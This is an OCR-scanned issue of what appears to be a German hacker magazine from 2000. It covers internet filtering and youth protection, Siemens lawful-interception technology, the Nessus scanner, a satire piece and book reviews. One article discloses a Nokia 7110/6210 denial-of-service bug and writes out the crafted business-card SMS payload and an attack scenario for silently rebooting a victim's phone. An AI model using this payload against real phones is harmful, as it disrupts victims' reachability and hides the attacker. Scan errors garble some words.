Der Ausschluss für Familie, Senioren, Frauen 
und Jugend lud zur Anhörung über Jugend- 
schutz im Internet ein und bat um Stellung- 
nahme. Geladen waren Expertinnen und 
Experten der Kirchmedia GmbH, des Deut- 
schen Jugendinstitutes, des Verbandes Privater 
Rundfunk- und Telekommunikation e.V., des 
Jugendschutz.net, der FSK, des Deutschen Kin- 
derschutzbundes e.V., der BPjS, des Hans-Bre- 
dow-Institutes für Medienforschung, der 
Landesmedienanstalt Saar, der FSM und des 
Chaos Computer Club e.V. Zum Thema gab es 
einen Fragenkatalog und einen Entschließungs- 
antrag der von SPD und Grünen getragen 
wurde. In diesem Antrag ging es beispielsweise 
darum, "einen wirksamen Jugendschutz recht- 
lich und technisch auch bei Anbieteren von 
Netzinhalten (z.B. in Online-Diensten) zu ver- 
wirklichen" oder auf die Bekanntmachung der 
Indizierungsentscheidungen im Bundesanzeiger 
zu verzichten, "um jugendgefährdenden Ange- 
boten in Datennetzen nicht zusätzliche Publizi- 
tät zu verschaffen " . 

Sachlichkeit sollte Trumpf sein und Experten 
sollten ihre Meinung kund tun. Ein gutes Kon- 
zept im Angesicht des emotional aufgeladenen 
Themas. Mit der Sachlichkeit war es aber spä- 
testens dann vorbei, als die Bundesprüfstelle 



und Jugendschutz.net mit ihrer Präsentation 
der "Gesammelten Scheußlichkeiten des Inter- 
nets der letzten Jahre" aufwartete und die 
Anhörung von der Sach- auf die Gefühlsebene 
kippte. Vom Zeitpunkt, da die Abgeordneten 
diese unsäglichen Bildchen und Parolen sahen, 
war man sich einig, daß man so etwas in jedem 
Falle unterbinden müsse. Anmerkungen der 
Abgeordneten wie: "Wenn uns das jetzt schon 
so schockt, was muß das dann erst mit Kindern 
machen?" oder " Kann man nicht verhindern, 
daß man sowas überhaupt aufrufen kann?" 
ließ an der "Medienkompetenz" mancher 
Abgeordneten zweifeln. 

Die Lösung liegt auf der Hand: wir filtern alles 
und machen den BPjS-lndex nicht mehr öffent- 
lich. 

Studien sprechen gegen den Einsatz von Fil- 
tern. Die COPA-Untersuchung (Commission on 
Child Online Protection, http://www.copacom- 
mission.org), eine us-amerikanische Studie die 
im Oktober dem Kongress vorgelegt wurde 
stellt die Tendenz zum "overblocking" von Fil- 
tersoftware fest, d.h. es fällt bei der Filterei vie- 
les sinnvolles unter den Tisch und in den 
meisten Fällen bleibt es für die User auch noch 
intransparent, was eigentlich genau gefiltert 
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wird. Dies drang nach meinem Empfinden aber 
nicht mehr in das Bewußtsein der nunmehr 
sozialethisch desorientierten Abgeordneten. 
Auch die Tatsache, daß Filtersoftware in Stu- 
dien (z.B. unter [1]) mit einer Fehlerquote von 
teilweise über 80% nicht gerade hervorragend 
abschnitten, schien nicht zum Nachdenken 
anzuregen. 

Die mangelnde Effizienz von Filtersoftware 
wurde auch von den anwesenden Experten 
zum größten Teil nicht bestritten. Die Vertrete- 
rin des Kinderschutzbundes bemerkte, daß 
auch die Seite ihrer Institution mit handelsübli- 
chen Filtersystemen nicht mehr aufzurufen sei, 
da auf diesen Seiten auch das Thema " Sex " 
thematisiert und somit die Seite herausgefiltert 
würde. Auch andere bestätigten diesen Ein- 
druck und hielten Filtersysteme nicht gerade für 
der Weisheit letzter Schluß. Dennoch blieb der 
Eindruck, daß nach dem Blick auf die Schmud- 
delecken des Internets, Filter ja irgendwie nicht 
schaden könnten und irgendwas müsse man ja 
tun. Der Bertelsmann-Konzern tut in diesem 
Zusammenhang ja auch was und empfiehlt Fil- 
ter an Schulen und Bibliotheken, sicherlich gibt 
es da auch finanzielle Unterstützung und dann 
kann's ja eigentlich nur gut sein, oder? 

Verkannt wurde von den meisten die Tatsache, 
mit ICRA [2] und anderen Filtermodellen, eine 
weltweite Zensur-Infrarstruktur zu etablieren. 
Auch die Frage der Vertreterin des Deutschen 
Jugendinstitutes "Wer kontrolliert die Kontrol- 
leure?" verhallte im Fraktionssaal der CDU/ 
CSU. 

Bemerkenswert, wie immer, daß es eigentlich 
nicht um Jugendschutz, um Jugendliche und 
deren Entwicklung ging, sondern darum, was 
man gesellschaftlich möchte und was nicht. 
Dabei soll hier nicht zur Debatte stehen, wie 
man Kinderpornos und dergleichen findet, son- 



dern daß es nicht um Konzepte für Jugendliche 
und deren Umgang mit Realitäten ging, son- 
dern um fiese Sachen, die man eben nicht will 
(auch nicht, und gerade nicht für Erwachsene). 
Dies kommt auch in einem Punkt des Entschlie- 
ßungsantrages zum Tragen, in dem die Nicht- 
Veröffentlichung der Entscheidungen der Bun- 
desprüfstelle im Bundesanzeiger gefordert wird. 

Das ist angedacht, um den Jugendlichen die 
Möglichkeit zu nehmen, sich die besten Adres- 
sen für fiese Sachen aus dem Bundesanzeiger 
zu besorgen. Wieweit der Bundesanzeiger tat- 
sächlich Verbreitung unter Jugendlichen findet, 
sollte man untersuchen, bevor man in das Mit- 
telalter zurückkehrt, wo ungeeignete Schriften 
vor den Laien auf dem päpstlichen Index 
geheimgehalten wurden. In einer Demokratie 
müssen entsprechende Indizierungen für den 
Bürger transparent sein und dürfen keinesfalls 
geheimgehalten werden. 

Ein interessanter Realitätsabgleich in der Welt 
der Politik, die Menschen vor Schlimmen 
bewahren will und dafür Grundrechte opfert. 



[1 ] http:/ '/www. peacefire. org/error-rates/ 
[2] http://www.icra.org 



#073 / Winter 2000 



dip datpnschLpurJpr. 



BIC BROTHER IS... LISTENINC! 



Big Brother is listening... 

von Andy Müller-Maguhn 



Wo ist eigentlich der Unterschied zwischen 
"Lawful Interception" und "Signal Intelligence"? 



Auf den folgenden Seiten drucken wir eine Broschüre der Firma 
Siemens ab, die Dienstleistungen bewirbt, die normalerweise 
nicht beworben werden: Lawful Interception. Das sogenannte 
"gesetzesmässige Abhören" - längst integrierter Funktionsum- 
fang des Telefonnetzes auf Basis etwa der Siemens EWSD -Tech- 
nologie (Elektronisches Wählsystem Digital) befindet sich dabei 
üblicherweise in der sogenannten "Passiv-vermarktung" [1], die 
Broschüre ist wohl eher für den speziellen Kundenkreis der 
"Bedarfsträger" formuliert. 

Auch wenn man als braver Bürger in Anerkenntnis der "freiheit- 
lich demokratischen Grundordnung" und des Grundgesetzes 
dabei neben dem Grundgesetz Artikel 10 Absatz 1 [2] auch die 
in Absatz 2 angedeuteten Einschränkungen und die entspre- 
chenden Vielfältigungen weiteren Gesetze (G10 - Gesetz, §§ 
100a, 100b der Straf- prozessordnung, §§ 39 bis 43 des Aus- 
senwirtschaftsgesetzes etc.) akzeptiert, so kann dies doch nicht 
darüber hinwegtäuschen, daß die Siemens-Technologie " Law- 
ful Interception" noch viel mehr ermöglicht. 

Denn die auf der einen Seite beworbene Erfüllung "strengster 
gesetzliche Vorgaben" (Broschüre Seite 15) sagt ja noch lange 
nicht, um welche Gesetze welchen Landes es sich handelt. Sie- 
mens verkauft sowohl die Vermittlungs- Stellentechnik EWSD 
als auch die dazugehörige LI (Lawful Interception) Technologie 
weltweit in alle möglichen Staaten. 

Mögen in einem Land wie der Bundesrepublik Deutschland die 
im Rahmen der mehr oder weniger Überzeugender Legitimati- 
ons-Simulation durchgeführten gesetzlich begründeten Ein- 
griffe in das Fernmeldegeheimniss immerhin auf nachlesbaren 
Gesetzen und Zuständigkeiten beruhen und sich entsprechend 
"demokratisch" nennen, so beruhen auch sogenannte "totali- 



[1] Passiv-Vermarktung ist das bereithalten von Produkten 
oder Dienstleistungen, deren Existenz allerdings extern nicht 
kommuniziert und beworben wird. Das "nationale" 1 TR6- 
I5DN bei der Telekom fällt darunter ebenso wie die Mickey- 
Mouse-Hefte in der Lutthansa Business Class: Angeboten wer- 
den einem die Sachen nicht, aber wenn man danach fragt, 
bekommt man es. 

[2] (1)Das Briefgeheimnis sowie das Post- und Fernmeldege- 
heimnis sind unverletzlich. 

(2) Beschränkungen dürfen nur auf Grund eines Gesetzes 
angeordnet werden. Dient die Beschränkung dem Schutze der 
freiheitlichen demokratischen Grundornung oder des 
Bestandes oder der Sicherung des Bundes oder eines Landes, so 
kann das Gesetz bestimmen, daß sie dem Betroffenen nicht 
mitgeteilt wird und dass an die Stelle des Rechtsweges die 
Nachprüfung durch von der Volksvertretung bestellte Organe 
und Hilfsorgane tritt. " 
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täre", "diktatorische" oder schlicht "undemokratische" Staaten 
in der Regel nicht weniger auf Gesetzen, und die entsprechen- 
den Eingriffe in das Fernmeldegeheimniss - so es denn über- 
haupt existiert - auf "gesetzlichen Vorgaben" . Kurz: wenn die 
Militärregierung eines afrikanischen Landes Ihre Bürger in gro- 
ßen Maßstab abhört ist das genauso "gesetzmässiges Abhö- 
ren" (lawful interception) wie die Aktionen der chinesischen 
Regierung gegenüber den internetnutzenden Bürgern Ihres 
Landes. 

An dieser Stelle kommen wir dann - der einfachkeit halber Ori- 
entiert an der zusammenfassenden Funktionsumfangsliste auf 
Seite 15 der Broschüre - an den nächsten Punkt, gleich nach 
"erfüllt strengeste gesetzliche Vorgaben". Dort steht: "flexibel 
konfigurierbar und skalierbar" und damit kommen wir zur ent- 
scheidenden Frage: wie bitteschön soll dein eine flexibel konfi- 
gurierbar- und skalierbare Technologie strengste gesetzkliche 
Vorgaben erfüllen? 

Auch auf diese Frage weiss die Broschüre eine Antwort, auf 
Seite 4: "Bei veränderten Anforderungen wieder Neuinvestitio- 
nen tätigen? Setzen Sie stattfessen auf eine flexible und aus- 
baufähige Gesamtlösung". 

Also: wenn wir - z.B. mithilfe von Gesetzen - unsere freiheitli- 
che Demokratische Grundordnung vom Effekt her in einen 
totalitären Staat verwandeln und entsprechend die gesetzlichen 
Grundlagen zur Telekommunikationsüberwachung ausdehnen 
ist das mit Siemens-Ll-Technologie ganz flexibel und ausbaufä- 
hig zu realisieren. Supa, oder? 

Neben den technischen Details dieses Systems - die interessante 
Kompatibilität zu Anforderungen von ETSI und NSA - aufweist 
(Absende- spezifische Telekommunikationsmarkierung und 
dezentrale T-Stücke mit Mustererkennungsweichen) sei aller- 
dings noch eine weitere Frage in den Raum gestellt: was ist 
denn eigentlich der Unterschied zwischen gesetzlich legitimier- 
ten Abhören (lawful interception) und dem großflächigen 
Abhören von Telekommunikation durch Geheimdienste (signal 
intelligence). 

Ich habe weder in der Broschüre noch in der Wirklichkeit bis- 
lang eine Antwort darauf gefunden, auch wenn wir natürlich 
normalerweise von einem gezielten Eingriff / Abhören von TK 
gegenüber dem standardmässigen und weitflächigen Abhören 
von TK ausgehen. Aber vielleicht findet sich unter den Lesern ja 
jemand, der eine überzeugende Antwort parat hat. Entspre- 
chende Hinweise nimmt jeder Telefonapparat am öffentlichen 
Netz unter dem Stichwort "Bundesstelle für Fernmeldestatistik" 
entgegen. 
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NOKIA - (DIS-)CONNECTINC PEOPLE.. 



Spaß mit Nokia - Denial of Service Attack 
für Mobiltelefone 

von Djenja und Robert S. Plaul 



Daß der nach eigenen Angaben größte Hersteller von Mobiltelefonen wirklich nette 
Taschenbeschwerer herstellt, die im Allgemeinen auch ziemlich gut funktionieren, dürfte 
den meisten von uns bekannt sein. Auch daß es da ein Modell gibt, das eben genau das 
manchmal nicht tut, und folglich seine Besitzer hauptsächlich mit der Frage quält, wann 
es wohl als nächstes abtürzen wird, hat sich mittlerweile herumgesprochen. Doch daß das 
Nokia 7110, um das es hier hauptsächlich gehen soll, sich remote rebooten läßt, ist schon 
weniger Leuten bekannt. 



Grund dafür ist ein Fehler im Resolving-Algo- 
rithmus, der zu einer Nummer den dazugehöri- 
gen Namen im Telefonbuch heraussucht. 
Existieren zu einem Namen nämlich zwei iden- 
tische Rufnummerneinträge, die außerdem 
jeweils mit einem " * " beginnen, so hängt sich 
das Telefon beim Auflösen der Nummer (ohne 
" * " versteht sich) auf. Dies betrifft alle Gele- 
genheiten, bei denen das Telefon versucht, 
statt einer Nummer einen Namen anzuzeigen, 
also Lesen von Kurzmitteilungen von dieser 
Nummer, Aufbau von Verbindungen zu dieser 
Nummer und natürlich ankommende Anrufe 
von dieser Nummer. Da der Algorithmus nur 
die letzten 7 Stellen vergleicht, kann es auch 
noch andere Nummern betreffen. Ankom- 
mende Anrufe von diesen Nummern werden 
nicht signalisiert und das Telefon begibt sich in 
einen extrem interessanten Modus: Während 
die Statusanzeige nichts erahnen läßt, bereitet 
sich das Telefon tief im inneren schon mal auf 
einen Reboot vor. Versucht man es dabei zu 
stören, etwa indem man Speicherfunktionen 
aufruft (Telefonbuch, Anruflisten, SMS), so 
bootet es auch sofort, ansonsten läßt es sich ca. 
eine Minute Zeit. Bei einigen Modellen kann es 
auch mal eine Viertelstunde sein, und einige 



Exemplare verweigern in dieser Zeit auch jegli- 
che sonstige Kommunikation. 

Nun mag dies alles recht wenig interessant klin- 
gen, denn wer hat schon so merkwürdige Ein- 
träge in seinem Telefonbuch? Nun ja, von 
selbst kommen die da nicht rein, aber vielleicht 
per SMS? 

Smart Messaging 

Um solche Dinge zu ermöglichen, hat Nokia 
das Smart Messaging erdacht. Jeder kennt die 
Visitenkarten, die sich nicht nur per IR, sondern 
auch als SMS verschicken lassen. Auch Logos 
und Klingeltöne werden so verschickt. Wir 
haben uns im Zusammenhang mit dem oben 
beschriebenen Bug etwas mit Smart Messaging 
beschäftigt und wollen Euch heute am Beispiel 
der Compact Business Cards einen kleinen Ein- 
blick geben. 

Die Telefone verschicken Business Cards nor- 
malerweise im standardisierten vCard-Format. 
Ja, genau, das ist das, was der Netscape Mes- 
senger manchmal mitschickt. Das Format funk- 
tioniert leider nicht, wenn man es selbst 
schreibt, da es von 8-Bit-Übertragung der SMS 
und dem User Data Header abhängig ist. Text- 
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SMS werden aber normalerweise nur im 7-Bit- 
Format übertragen. 

Doch fuer Business Cards gibt es noch ein 
anderes in den Smart Messaging Specifications 
festgelegtes Format, das sich auch mit dem in 
eurem Telefon eingebauten Gimmick-Parser 
verschicken läßt. Das Format ist ziemlich simpel 
und geht so (<lf> = Line feed); Schlüsselwörter 
sind grundsätzlich case-sensitive.) 

Business Card<lf> <name><lf> <com- 
pany><lf> <title><lf> <phone><lf> 
<fax><lf> <email><lf> <postal-ad- 
dressXlf > 

Alle Felder, die in der Mitte leergelassen wer- 
den sollen, müssen trotzdem mit <lf> abge- 
schlossen werden. Alle am Ende leergelassenen 
felder können weggelassen werden. Der Auf- 
bau von <phone> und <fax> ist tel Telefon- 
nummer bzw. fax <faxnummer> wobei auch 
mehrere durch <lf> getrennte Zeilen exitieren 
können. Beispiel: Business Card<lf> T-0190- 
lnfo<lf> <lf> <lf> tel +49130190190<lf> 

Einziges Problem ist, daß man Nokia-Telefonen 
normalerweise kein Linefeed eingeben kann. 
Doch z.B. mit dem Palm-Programm "SMS 
Monkey Messenger" lassen sich selbst in der 
Shareware-Demo-Version genug LFs per IR 
zum Telefon schicken. 

Nokia Attacks! 

Doch kehren wir zurück zum Ausgangspunkt 
dieses Berichtes: Wir wollten ja ein Telefon 
remote rebooten. 

Stellen wir uns einmal folgendes Beispiel vor: 
Angreifer A schickt Opfer O direkt oder über 
einen FreeSMS-Dienst Business Card vom fol- 
genden Format: 

Business Card<lf> Claudia<lf> <lf> <lf> tel 
*0172xxxxxxx<lf> tel *0172xxxxxxx<lf> 
claudia_17@hotmail.com<lf> 



ich die Nummer ja mal gebrauchen" und spei- 
chert sie ab. Kurze Zeit später ruft A von einem 
beliebigen Telefon, das xxxxxxx als letzte Stel- 
len der abgehend übermittelten Rufnummer 
hat, bei O an. Und drei Minuten später wieder. 
Und wieder. O bekommt von den Anrufen 
nichts mit, da das Telefon ja nichts anzeigt. 
Vielleicht bemerkt er noch nicht einmal, daß 
sein Telefon regelmäßig rebootet und dadurch 
fast die ganze Zeit nicht erreichbar ist. Ist O 
beruflich von Erreichbarkeit abhängig, so kann 
das böse Folgen haben. Wenn A auch noch 
eine SMS von einer xxxxxxx-Nummer aus an A 
schickt, kann O keine SMs mehr lesen, bis er 
den Eintrag im Telefonbuch gelöscht hat. 

Da für xxxxxxx-Nummern keine Einträge in der 
Anruferliste angelegt werden, wird O auch nie 
erfahren, von welcher Nummer A anruft, denn 
A verwendet natuerlich_nicht_ die 0172- 
xxxxxxx. Findet O tatsächlich den Telefonbuch- 
eintrag, so fällt der Ärger womöglich noch auf 
den Besitzer der D2-Nummer zurück. 

Betrifft's mich? 

Der Bug wurde uns mittlerweile von vielen Leu- 
ten bestätigt. Allerdings kursierte die Meinung 
er beträfe nur ältere Telefone. Nun ja, zumin- 
dest mit von uns getesteten 71 10ern mit den 
Softwareversionen 4.80, 4.84, 4.88 und 5.00 
hat alles problemlos funktioniert. Auch ein 
6210 mit V4.08 war betroffen. Man bedenke, 
daß die Version 5.00 erst wenige Wochen alt 
ist. Bedanken wir uns bei Nokia ! 

Wir werden uns weiter mit Smart Messaging 
beschäftigen und bei Interesse (hoffentlich) in 
der nächsten DS weiter berichten. Weitere 
Informationen zu Smart Messaging finden sich 
in den Smart Messaging Specifications, die man 
im Developer-Bereich von [1] findet. Feedback 
zum Artikel an ma\\to:nokiafun@high.de. 



O empfängt die Visitenkarte und denkt sich 

"Wer auch immer Claudia ist, vielleicht kann m /,^ ;//www .f 0 rum.nokia.com/ 
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OFFTOPIC 



To the Citizens of the 
United States of America, 



In the light of your failure to elect a President of the USA and thus to govern yourselves, we 
hereby give notice of the revocation of your independence, effective today. 



HerSovereign Majesty Queen Elizabeth II will 
resume monarchial duties over all states, com- 
monwealths and other territories. Except Utah, 
which she does not fancy. Your new prime min- 
ister (The rt. hon. Tony Blair, MP for the 
97.85% of you who have until now been 
unaware that there is a world outside your bor- 
ders) will appoint a minister for America with- 
out the need for further elections. Congress 
and the Senate will be disbanded. A question- 
naire will be circulated next year to determine 
whether any of you noticed. 

To aid in the transition to a British Crown 
Dependency, the following rules are introduced 
with immediate effect: 

1. You should look up "revocation" in the 
Oxford English Dictionary. Generally, you 
should raise your vocabulary to acceptable lev- 
els. Look up "vocabulary". Usingthesame 
twenty seven words interspersed with filier 
noises such as "like" and "you know" is an 
unacceptable and inefficient form of communi- 
cation. Look up "interspersed". 

2. There is no such thing as "US English". We 
will let Microsoft know on your behalf. 

3. You should learn to distinguish the English 
and Australian accents. It really isn't that hard. 

4. Hollywood will be required occasionally to 
cast English actors as the good guys. 



5. You should relearn your original national 
anthem, " God Save The Queen " , but only 
after carrying out task 1 . We would not want 
you to get confused and give up half way 
through. 

6. You should stop playing American "foot- 
ball". You will no longer be allowed to play it, 
and should instead play proper football. Those 
of you brave enough will, in time, be allowed 
to play rugby (which is similar to American 
"football", but does not involve stopping for a 
rest every twenty seconds or wearing füll kevlar 
body armour like nancies). 

7. You should declare war on Quebec and Fra- 
nce, using nuclear weapons if they give you 
any merde. The 98.85% of you who were not 
aware that there is a world outside your bor- 
ders should count yourselves lucky. The Rus- 
sians have never been the bad guys. "Merde" 
is French for "shit". 

8. July 4th is no longer a public holiday. Nov- 
ember 8th will be instead, but only in England. 
It will be called "Indecisive Day". 

9. All American cars are hereby banned. They 
are crap and it is for your own good. When we 
show you German cars, you will understand 
what we mean. 

10. Please teil us who killed JFK. It's been driv- 
ing us crazy. Thank you for your Cooperation. 
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Nessus - Admins Fluch oder Segen? 

von Cemil Degirmenci 



Nessus ist ein Remote-Security-Scanner welcher der Internetgemeinde völlig frei zur Verfü- 
gung steht und sich sehr leicht per Scripts updaten lässt. Nessus beruht im Gegensatz zu 
fast allen anderen Scannern auf einen Client-Server Prinzip. Nessus vertraut, wenn man 
der Website glauben schenken darf, nichts und niemanden. 



Seit wann gibt es Nessus? Nessus wird im 
Januar 2001 3 Jahre alt. Die öffentliche Version 
ist 2,5 Jahre alt. Während dieser Zeit wurde er 
selbstverständlich gut betreut, und ist im Bezug 
auf Sicherheit "up-to-date". 

Wieviele Leute arbeiten an Nessus? Das Kern- 
team besteht nur aus 2 Leuten, Jordan Hrycaj 
und Renaud Deraison, zusätzlich kommt noch 
Unterstützung von vielen anderen Menschen 
rund um die Welt, wie bei OpenSource üblich. 

Warum Nessus? 

Auf die Frage, warum Nessus programmiert 
wurde, erhielt ich folgende Antworten von 
Deraison: " To attempt to impress girls : 
Sehously though, l'm doing that because: 

• Everyone should be able to determine if 
one's network (or Single Workstation) can be 
easily broken into or not, without having to 
pass a degree in System administration and 
without having to pay thousands of dollars. I 
don't want a 2,000 hosts lab to be broken into 
just because they can not afford to assess their 
own security. I don't want to letJohn Doe, 
who's been running Linux on his Computer for 
less than 10mn, to become a DDoS agent 
because the distribution he installed was ship- 
ped with buggy stuft, (read : "free security for 
all - from the most knowledgeable to the new- 
comer") 



• Other vulnerability Scanners are not clear in 
how they really perform a security audit. You 
don 't see how they work, so you don 't know 
how accu rate they are. (read: "opensource 
tools are great. Proprietary ones are not") 

• It's extremely tun. Try it, it's addictive. " 
Wie denkt Nessus? 

Er "denkt" nicht nach ports, sondern nach 
Eigenschaften der ports. So könnte z.B. der 
Webserver auf Port 22 (ssh) laufen, Nessus 
würde es nicht als ssh abstempeln, sondern 
würde wirklich den Webserver erkennen. Nes- 
sus checkt jeden Port des Hosts nach: -Service 
der auf dem Port läuft -Versionsnummer des 
Services -Begrüssungsteste, etc -Bekannten 
Sicherheitslücken -Bekannten Standard-/ 
Defaultpasswörter -Bekannten Exploits. 

Weshalb die Modularität? 

Naja, eigentlich doof die frage, ich weiss, aber 
sie muss ja mal gestellt werden: Es gibt zu wirk- 
lich vielen Sicherheitslücken der letzten Zeit 
sogenannte "Exploits". Nessus besitzt die 
Möglichkeiten diese Exploits in seinen Scan 
miteinzubauen. Dadurch erhält der Systemad- 
ministrator einen guten Einblick in sein System, 
und weiss wo ein Cracker eindringen könnte. 
Als kleines feature enthält Nessus NASL (Nes- 
sus Attack Scripting Language), welche es 
erlaubt leicht und schnell Plugins zu program- 
mieren. Auch Plugins in C sind möglich. 



wmm 
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Wie ist Nessus den eigentlich aufgebaut? 

Nessus ist auf einer client-server architecture 
aufgebaut, was sehr viele Vorteile mitbringt. 




Einmal a) dem Server welcher die Attacken aus- 
führt, und einmal dem Client welcher als Fron- 
tend dient. Man kann Server und Client auf 
unterschiedlichen Systemen laufen lassen. Das 
bietet z.B. einem Sysadmin die Möglichkeit sein 
ganzes Netzwerk von einer normaler Work- 
station aus zu überwachen, während im Keller 
die Mainframe das ganze Netz auf Sicherheits- 
löcher überprüft. Es gibt Clients für X, für 
Win32 und für Java. Es ist ausserdem möglich 
unzählige scans gleichzeitig laufen zu lassen 
(vorausgesetzt der Server macht das mit) 




Nessus glaubt nicht daran das Version x.x.x der 
Software gegen Bug-XYZ immun ist, Nessus 
prüft es. 



Und wie sagt mir Nessus dann was er 
gefunden hat? 

Nessus sagt nicht nur, was alles faul ist, sondern 
sagt auch gleich "wie" faul es ist (von low bis 
high). Nessus hat mehrere möglichkeiten seine 
"reports" anzuzeigen. -ASCII -LaTeX -HTML - 
*.nsr (das eigene format). Und das wichtigste 
an Nessus: Es ist frei, und frei von jedem Kom- 
merz. 

Und wie gehen die Admins damit um? 

Einerseits könnte Nessus bald zum unersetzli- 
chen security-tool für Admins werden, anderer- 
seits könnte Nessus dem einen oder anderen 
Admin zum Hals raushängen, nachdem es sich 
die Herren Möchtegern-Hacker in seinem Netz- 
werk gemütlich gemacht haben. Auf Nessus 
darf man sich allerdings nicht zu 100% verlas- 
sen. Es kommt immer wieder vor, dass Nessus 
ein Sicherheitsloch findet, welches eigentlich 
gar keins ist. Andersherum geht das ganze Spiel 
auch. Nessus gibt z.B. ein "normalen" security- 
notify aus, den selbst ein blinder Administrator 
als gravierende Lücke erkennen würde. Ausser- 
dem empfehle ich persönlich Nessus oft zu 
updaten, um so immer ein Optimun an Sicher- 
heit zu Gewährleisten. 

Sollten Gesetze kommen die "hackertools" 
verbieten, so ist Nessus sicher eines der ersten 
Tools die verschwinden. Wieviel mehr Systeme 
danach gehackt werden, weil die Admins oft 
einfach nicht in der läge sind _alle_ Sicherheits- 
lücken zu kennen ist die frage. In den USA 
wurde Nessus übrigens von der Regierung zu 
den toplOder "must-have-security-tools" ein- 
gestufft, was die Qualität von Nessus wirklich 
gut unterstreicht. 

Generell ist Nessus jedem Admin wirklich sehr 
ans Herz zu legen. Sein Chef wird es ihm even- 
tuell eines Tages danken. 
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A Short Course in 
the Secret War 

von Christopher Felix 

Christopher Felix oder, wie er mit richtigem 
Namen heißt, James McCargar, war als Beam- 
ter des US-Außenministerium jahrelang im Auf- 
trag des CIA in Osteuropa tätig. In seinem Buch 
beschreibt er detailliert, wie ein Geheimdienst 
arbeitet, welche Methoden die nicht-techni- 
sche Aufklärung (die Originalausgabe des 
Buches erschien 1963) anwendet und wie dar- 
aus Schlüsse und Handlungen abgeleitet wer- 
den. 

Pikanterweise wurde ich auf das Buch im 
Bericht des Hamburgischen Landesamtes für 
Verfassungsschutz über den Geheimdienst der 
Scientology-Organisation (die Broschüre ist 
trocken, aber auch "gegen den Strich" lesens- 
wert und kann dort angefordert werden) auf- 
merksam. 

Eine kleine Warnung: McCargar schreibt einen 
zum Teil trockenen, etwas professoralen Stil 
und benutzt oft Ausdrücke, die nicht im Voka- 
bular eines vorwiegend an technischem Eng- 
lisch geschulten Hackers auftauchen - ich 
jedenfalls mußte einige Begriffe nachschlagen 
und auch ein paar verklausulierte Sätze mehr- 
fach lesen. 

Dennoch: Die Mühe lohnt sich, wird einem 
doch fernab jeder Verschwörungstheorie deut- 
lich, welche Möglichkeiten der Informationsbe- 
schaffung den Diensten offenstehen, auch 
ohne technische Verfahren einzusetzen. Dies 
sollte bei der Bewertung technischer Angriffs- 
möglichkeiten, die sonst zuerst in unser Blick- 
feld gelangen, zu denken geben - eine 
wertvolle Horizonterweiterung also. <pirx> 

, A Short Course in the Secret War, 3rd Ed., Verlag Ma- 
dison Books, ISBN: nicht bekannt DM 40- (ca.) 



E-Privacy: Daten- 
schutz im Internet 

von Helmut Bäumler (Hrsg.) 

Ende August dieses Jahres fand in Schleswig- 
Holstein eine Sommerakademie zum Thema 
"E-Privacy - Datenschutz im Internet" statt. 
Die Materialien für diese Sommerakademie 
sind zeitgleich als Begleitbuch in der Fachbuch- 
reihe DuD-Fachbeiträge (DuD steht für Daten- 
schutz und Datensicherheit) erschienen. Dieses 
von Helmut Bäumler, dem Leiter des "Unab- 
hängigen Landeszentrums für Datenschutz 
Schleswig-Holstein", herausgegebene Buch 
wendet sich daher in erster Linie an den fach- 
kundigen Leser, was sich leider auch durch den 
mit 69,- DM nicht gerade günstigen Preis zeigt. 

Das Buch besteht aus fast 30 Fachartikeln auf 
331 Seiten von Wissenschaftlern, Journalisten 
und anderen Fachleuten. Den Anfang machen 
Beiträge zum Thema Online-Profiling und den 
damit verbundenen Mechanismen wie Cookies 
oder Web-Bugs. Ein weiterer Abschnitt 
beschäftigt sich mit der Regelung durch den 
Staat, den Gesetzen zum Schutz der Privat- 
sphäre und der Bekämpfung der Internetkrimi- 
nalität. Ein Beitrag zur "Internet Governance" 
ist hervorzuheben, er beschreibt eine mögliche 
Ordnung des Internets. Als nächstes werden 
mögliche Steuerungselemente des Datenschut- 
zes wie Anonymisierer, mögliche elektronische 
Zahlungsmittel im E-Commerce und das P3P- 
Protokoll diskutiert. Aber auch der Verbraucher 
selbst muß sich schützen. Dies ist Gegenstand 
des fünften Kapitels. Ein "Identitätsmanage- 
ment" wird unter anderem vorgeschlagen. Im 
sechsten Abschnitt wird ein Blick in die Zukunft 
gewagt. So werden Projekte zu Internet-Wah- 
len und Online-Verwaltung vorgestellt. Die 
Entwicklung des Datenschutzes und der Aufga- 
ben der Datenschutzbeauftragten werden 
ebenfalls in diesem Kapitel diskutiert. Das Buch 
schließt mit Prognosen und konkreten Szena- 
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rien für die Umsetzung des Datenschutzes in 
der Zukunft. 

Das Buch ist ein Fundus an Informationen und 
deckt ein sehr breites Spektrum an Themen ab. 
Man muß aber schon ein gewisses Interesse 
und Vorwissen mitbringen, denn die Beiträge 
sind im Stil von Fachartikeln geschrieben und 
enthalten oft eine Vielzahl von Fußnoten mit 
Nebenbemerkungen, Definitionen oder Quel- 
lenangaben. Dafür dürfte der Wunsch auf Hin- 
weise nach weiterführender Literatur mehr als 
gedeckt sein. Wer sich eingehend mit Themen 
des Datenschutzes und den Plänen für die nahe 
Zukunft beschäftigen möchte, sollte einen Blick 
in dieses umfangreiche Buch werfen. <seba- 
stian> 

Helmut Bäumler (Hrsg.), E-Privacy - Datenschutz im 
Internet, Verlag DuD-Fachbeiträge, Vieweg Verlag, 
Braunschweig/Wiesbaden, ISBN: 3-528-03921-3 DM 
69- 

Vom Ende der 
Anonymität : Die 
Globalisierung der 
Überwachung 

von Christiane Schulzki-Haddouti 

Gerade erschienen ist das von Christiane 
Schulzki-Haddouti herausgegebene Telepolis- 
Buch "Vom Ende der Anonymität: Die Globali- 
sierung der Überwachung". Der Untertitel des 
Buches trifft meiner Meinung nach besser den 
Inhalt, da das Buch in erster Linie von der Aus- 
dehnung der Überwachung und dem Eindrin- 
gen in die Privatsphäre handelt und erst in 
zweiter Linie der Frage nach der Anonymität 
nachgeht. Wie das vorgenannte Buch besteht 
dieses auch wieder aus Beiträgen namhafter 
Autoren, wobei jedoch die Zielgruppe eine 
breitere ist. 



Das Buch ist unterteilt in fünf Abschnitte. Der 
erste Abschnitt handelt von der Überwachung 
durch die Strafverfolgung. Hauptsächlich wird 
auf die jüngste Entwicklung in Europa einge- 
gangen, die durch die Einrichtung zahlreicher 
Computersysteme zur staatenübergreifenden 
Speicherung von Überwachungsdaten und der 
stetigen Ausweitung der Befugnisse der Euro- 
pol geprägt ist. Einen besonderen Stellenwert 
bekommen die Vorgänge um die mit "Enfopol" 
bezeichneten geheimen Dokumente zur Aus- 
weitung der Überwachung und der Weitergabe 
der Überwachungsanordnungen zwischen EU- 
Staaten. 

Im zweiten Abschnitt werden die Aktivitäten 
der Geheimdienste besprochen. In den Beiträ- 
gen von Nicky Hader und Duncan Campbell 
